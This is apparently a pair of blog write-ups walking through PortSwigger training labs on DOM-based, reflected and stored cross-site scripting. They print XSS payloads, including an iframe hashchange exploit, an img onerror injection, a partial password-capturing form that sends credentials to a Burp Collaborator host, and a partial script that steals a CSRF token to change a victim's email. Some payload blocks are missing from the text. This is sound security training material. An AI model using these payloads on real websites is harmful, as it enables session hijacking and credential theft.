PortSwigger- Advanced DOM-based XSS

Hello folks,
This blog delves into the identification and exploitation of DOM-based Cross-site Scripting (XSS) vulnerabilities on websites incorporating third-party dependencies. It also examines these vulnerabilities within the context of reflected and stored XSS. Practical exercises will be conducted using the PortSwigger platform.
For those interested in exploring DOM-based XSS vulnerabilities, PortSwigger’s labs offer valuable resources.
Similarly, our website hosts a blog post dedicated to understanding DOM-based XSS.
Furthermore, our blog provides insights into Reflected and Stored XSS vulnerabilities, offering practical demonstrations.
Let’s now proceed without any delay and begin the penetration testing process for DOM-based XSS on PortSwigger’s labs.

Lab 1- DOM XSS in jQuery anchor href attribute sink using location.search source

When using JavaScript libraries like jQuery, certain functions like attr() can manipulate DOM elements, potentially leading to Cross-Site Scripting (XSS) vulnerabilities. If user-controlled data from the URL is passed to attr(), it can be exploited to execute malicious JavaScript, as demonstrated by modifying the URL to contain a harmful script that gets executed upon clicking a manipulated anchor element. Let’s see the same in practice.
We have the option to review the lab description and proceed by clicking on ‘Access The Lab‘. When aiming to exploit XSS vulnerabilities, it’s crucial to identify an input parameter that incorporates our input string within the client-side webpage. This website hosts several blogs, each featuring a comment function. By examining the URL, we may encounter a redirectPath parameter, potentially facilitating the exploitation of this DOM-based XSS vulnerability. Let’s input a value into this parameter and search for it within the Inspect element.

1.1 Got reflection in DOM 1

We can see that our input is included in the href. We can try to exploit it by providing the following input:


After the JavaScript on the page assigns this malicious URL to the href of the backlink, clicking on the backlink will trigger the alert.

1.2 Got alert 1

As soon as we click on the “Back” button, we will find that the alert() function is executed. Hence the lab will be solved

Lab 2- DOM XSS in jQuery selector sink using a hashchange event

The $() selector function in jQuery has the potential to insert harmful elements into the DOM, which may result in XSS risks. Previous iterations of jQuery were susceptible to XSS attacks due to manipulations of the location.hash source, especially within hashchange event handlers. Although more recent versions of jQuery have addressed this issue, older code remains vulnerable, sometimes triggered through iframe injections to induce a hashchange event and execute malicious scripts without user involvement.
We can read the lab description and click on ‘Access The Lab’. Whenever we target XSS vulnerability, we must find an input parameter that simply includes our input string somewhere on the client side’s web page. On this website, we can see that $() selector function of jQuery is used which can be vulnerable to DOM-based XSS.

2.1 vulnerable functionality

To exploit this vulnerability, we need a public server (Exploit Server) that will host the malicious <iframe> tag. Then we can send it to our victim. Let’s go to the exploit server and provide the following <iframe> tag:

<iframe src=”https://Target_web_application/#” onload=”this.src+='<img src=CyberiumX onerror=print()>'”></iframe>

This payload will trigger a hashchange event without interaction and execute the print() function. Let’s try the same on ourselves by clicking on the “View exploit” button.

2.2 Got print

We can see that the print functionality is executed, confirming the vulnerability. Now, let’s deliver the exploit to our victim which will solve the lab.

Lab 3- DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded

When utilizing frameworks like AngularJS, it becomes possible to execute JavaScript without the need for angle brackets or events. By employing the ng-app attribute within an HTML element, AngularJS processes the website, allowing the execution of JavaScript contained within double curly braces, whether it’s within the HTML itself or attributes.
We can start by reading the lab description and then clicking on ‘Access The Lab’. To check if the website uses AngularJS, we can search for the phrase “ng-app” in the web application’s source code.

3.1 ng app is mentioned

We can see that it is available, hence the website using AngularJS. We can now use the XSS payloads for AngularJS available on this GitHub repository.
On the Github, we can see that we have many payloads. Let’s take the following one to exploit the vulnerability:


When we’re looking for XSS vulnerabilities, we need to find a spot where we can enter text on the webpage. There is a search functionality available on the homepage. Let’s provide this payload in the search parameter.

3.2 got alert 1

We can see that as soon as we submit the payload, the alert() function is executed. We have successfully exploited the XSS vulnerability within AngularJS. Hence the lab is solved.

Lab 4- Reflected DOM XSS

Some website vulnerabilities are contained within one page. They happen when a script takes data from the web address and puts it somewhere risky on the page. But only some of the data comes from the web address; sometimes, the website itself sends back data that can cause problems. For instance, when the website echoes back what’s in the web address, it can create a risk called reflected DOM XSS. In this situation, the server handles the data from the request and sends it back in response, which can lead to unsafe handling of the data and cause problems on the page. eval() function is an example of such a JavaScript string literal.
We can read the lab description and click ‘Access The Lab’. On this web application, we can see that there is a vulnerable JS file “searchResults.js” in which the eval() function is used.

4.1 vulnerable eval function

Now we have to find that a parameter whose value is included in the eval() function. On the homepage, we will find a search box. Let’s include any input to confirm where and how our input is getting reflected. We can check this either on Burp Suite or using the Inspect element (Network tab) on our browser.

4.2 output

We can confirm that our input is getting reflected in JSON format. Now, we have to somehow execute the malicious JS code by closing the string present in JSON format as follows:


In this payload, we’ve included a backslash (\) to make sure the application doesn’t ignore the double quote (). Then we put a hyphen () to separate things, and after that, we added the alert(1) function. We finished by closing the curly brace (}) and putting double forward slashes (//) to comment out the rest of the query.
Let’s submit this payload in the search parameter.

4.3 Got reflection

We will see that the alert() function is successfully executed by exploiting the Reflected DOM XSS vulnerability. Hence the lab is solved.

Lab 5- Stored DOM XSS

Websites can save information on their servers and then show it in different parts of the site. In a stored DOM XSS issue, when a website stores information from a user and later displays it, a problem can occur if the website doesn’t handle this information properly. For example, if a script is used to show this information in a risky way, like directly setting the innerHTML of a page element to something like “comment.author“, it can lead to security problems.
We can read the lab description and click on ‘Access The Lab’. On this website, we have to find a functionality that can store the user’s content. We will find blog pages, and on each one, we have a comment functionality where we can target the Stored DOM XSS vulnerability. Let’s provide the following XSS payload in the comment field and fill rest of the fields accordingly:


5.1 not able to execute script

We can see that the payload is filtered and the alert() function is not executed. Now somehow we have to find a way to bypass the filter. We have to use the try and error method to identify a payload that might work here. After some tries, we will see that the following payload worked:

<><img src=a onerror=alert(“CyberiumX”)>

5.2 comment

This is how we exploit DOM-based XSS with Stored XSS vulnerability. Hence the lab is solved.

In this blog, we covered the advanced aspects of DOM-based Cross-site Scripting (XSS) vulnerability. If you have any doubts or questions please comment below.
You guys can check out our other blogs for PortSwigger’s Web Application vulnerabilities on our website.

Happy Pentesting!
Team CyberiumX


PortSwigger- Reflected & Stored Cross-site Scripting

Hello folks,
This blog focuses on how we can identify and exploit Cross-site Scripting (XSS) vulnerabilities on websites. This blog focuses on only two out of three types of XSS vulnerabilities, i.e. Reflected XSS and Stored XSS. We will be practicing these vulnerabilities on the PortSwigger platform.
You can check out the PortSwigger’s labs for Cross-site Scripting vulnerability.
Before proceeding with the labs, we will be explaining about the concepts of XSS vulnerability and its types.

Cross-site Scripting (XSS) is a significant vulnerability in web applications, wherein an attacker injects malicious JavaScript code into any request parameter. Subsequently, the web application displays this code within the HTML document of the webpage.

There are three types of Cross-site Scripting:
1. Reflected XSS– It happens when the user submits a malicious JavaScript code within the HTTP requests and the application considers the code as a part of the HTML response.
2. Stored XSS– It happens when the user submits a malicious JavaScript code into a parameter whose values are stored in the database. Whenever any user tries to visit the same page, they will get the reflection of that malicious JavaScript code.
3. DOM-based XSS– It is a type of client-side attack where the attacker injects malicious code into a parameter, which is then processed by the client-side script within the Document Object Model (DOM) of a web application. This injected code interacts with the DOM, potentially altering the intended behavior of the application and leading to unauthorized actions or data theft.

In this blog, we will be focusing on the practical aspects of Reflected and Stored XSS. In the upcoming blogs, we will cover DOM-based XSS in detail.

Let’s now proceed without any delay and begin the penetration testing process for XSS on PortSwigger’s labs.

Lab 1- Reflected XSS into HTML context with nothing encoded

In this scenario, we will see the basic example of Reflected XSS vulnerability and will understand how to identify it.
We can read the lab description and click on ‘Access The Lab’. This lab can be performed without Burp Suite as well.
Whenever we target XSS vulnerability, we must find an input parameter that simply includes our input string somewhere on the client side’s web page. On this website, we have a search functionality where we need to check whether our value is getting reflected or not.
Let’s search ‘CyberiumX’ and we will find that our input is included in the webpage.

1.1 reflection

Now, let’s use the basic JavaScript payload to call an alert() function as follows:


We will find that the alert() function is called successfully and this is how we can confirm that the search parameter is vulnerable to Reflected XSS.

1.2 Lab solved

Hence, the lab is solved.

Lab 2- Stored XSS into HTML context with nothing encoded

In this scenario, we will see the basic example of Stored XSS vulnerability and understand how to identify it.
We can read the lab description and click on ‘Access The Lab’. This lab can be performed without Burp Suite as well.
For stored XSS, we have to find a functionality that stores the data provided by the user in the database server. In this lab, we have a comment functionality on every blog post mentioned on the home page. There are 4 fields: Comment, Name, Email and Website. We have to try every field for XSS vulnerability but if you provide any value other than an email or a website on the ‘Email’ and ‘Website’ fields, then we will not be able to submit the request.
Let’s put the following XSS payloads in the Comment and Name fields:


2.1 Stored XSS payload e1709187032774

Now let’s click on ‘Post Comment’ to save the comment.
If we go back to the same blog page, we will see the reflection of the alert() function which confirms that the ‘Comment’ field is vulnerable to XSS.

2.2 Lab solved

Hence, the lab is solved.

Lab 3- Exploiting cross-site scripting to steal cookies

Now from this lab, we will focus on the impacts of Stored XSS vulnerability. We will start with stealing Cookies.
We can read the lab description and click on ‘Access The Lab’. Also, we will require the Burp Suite Professional edition.
To steal the cookies of any user, we have to identify a stored/reflected XSS vulnerability on the website. In this lab, we will find many blog posts and on every post, we have comment functionality that we can target for stored XSS vulnerability. Let’s open Burp Collaborator which will help us get a public domain name.
In the comment field, provide the following cookie-stealing payload and fill the rest fields accordingly:


3.1 Cookie stealing payload e1709187130291

Let’s click on ‘Post Comment’ which will submit this payload on this blog page. Now, when any user visits the same blog post, their cookies will be sent to the attacker-controlled domain name (Burp Collaborator). Switch to the Burp Collaborator client and click on ‘Poll now’ and we will find that there are some DNS and HTTP requests. Let’s check each HTTP request and in any one of them we will find the cookies of the victim user.

3.2 Got cookies

Let’s now try to insert these cookies into our browser to log in as a victim user. We need to open the Developer option (Inspect Element) by pressing Ctrl+Shift+I and then depending on our browser; in Google Chrome and Brave browsers go to the ‘Application’ tab while in the case of Mozilla Firefox browser, we have to go to ‘Storage’ tab where we will find current cookies. Now we have to replace the old cookie values with the one we received on the Burp Collaborator client and then refresh the page.

3.3 Provided cookie on browser

After refreshing the page, we have to go to the ‘My account’ page which confirms that we are successfully logged in as the victim user (administrator). Hence the lab is solved.

Lab 4- Exploiting cross-site scripting to capture passwords

In this scenario, we will see how an attacker can exploit XSS vulnerability and capture stored passwords of the victim’s browser.
We can read the lab description and click on ‘Access The Lab’. Also, we will require the Burp Suite Professional edition.
To steal the stored passwords of any user, we have to identify a stored/reflected XSS vulnerability on the website. In this lab, we will find many blog posts and on every post, we have comment functionality that we can target for stored XSS vulnerability. Let’s open Burp Collaborator which will help us get a public domain name.
In the comment field, provide the following cookie-stealing payload and fill the rest fields accordingly:

<input name=username id=username>
<input type=password name=password onchange=”if(this.value.length)fetch(‘https://<Burp_Collaborator_URL>’,{
mode: ‘no-cors’,

4.1 password stealing payload e1709187300133

Let’s click on ‘Post Comment’ which will submit this payload on this blog page. Now, when any user visits the same blog post, their credentials will be sent to the attacker-controlled domain name (Burp Collaborator). Switch to the Burp Collaborator client and click on ‘Poll now’ and we will find that there are some DNS and HTTP requests. Let’s check each HTTP request and in any one of them we will find the credentials of the victim user.

4.2 Burp collaborator req

Finally, let’s go to the ‘My account’ page and log in with the help of the gathered credentials. We will find that we are logged in as administrator user. Hence the lab is solved.

Lab 5- Exploiting XSS to perform CSRF

In this scenario, we will see how an attacker can exploit XSS vulnerability and change the details like email address, phone number, etc. of the victim user by capturing the CSRF token used in the victim’s browser.
To force a victim to change their details with the one that the attacker provides, we need to find and exploit the XSS vulnerability on the target web application and then see if any CSRF token is being used or not. If it is used then we have to submit a malicious JavaScript payload which will capture the token and change the victim’s account information.
We can read the lab description and click on ‘Access The Lab’. Also, we will require the Burp Suite Community edition.
First, let’s visit the ‘My account’ page and then log in with the help of your credentials. After logging in, we can see that we have an email change functionality available on our profile page. Let’s change our email address to any new value and then switch to Burp Suite to identify the POST request used to change the email address.
In the POST request, we have a CSRF token used in the body of the request which will stop us from performing a CSRF attack on the victim.

5.1 CSRF toekn is used

Now, we need to find an XSS vulnerability to capture the CSRF token and then change the email address of our victim user. In this lab, we will find many blog posts and on every post, we have comment functionality that we can target for stored XSS vulnerability. In the comment field, provide the following payload to change the email address of the victim user by capturing their own CSRF token and fill the rest fields accordingly:

var req = new XMLHttpRequest();
req.onload = handleResponse;
function handleResponse() {
var token = this.responseText.match(/name=”csrf” value=”(\w+)”/)[1];
var changeReq = new XMLHttpRequest();
    changeReq.open(‘post’, ‘/my-account/change-email’, true);

5.2 Post comment

Let’s click on ‘Post Comment’ which will submit this payload on this blog page. Now, when users visit the same blog post, their email address will change to the malicious one. Hence the lab is solved.

In this blog, we covered the Reflected and Stored Cross-site Scripting (XSS) vulnerability. In the next blog, we will cover the DOM-based XSS.

You guys can check out our other blogs for PortSwigger’s Web Application vulnerabilities on our website.

Happy Pentesting!
Team CyberiumX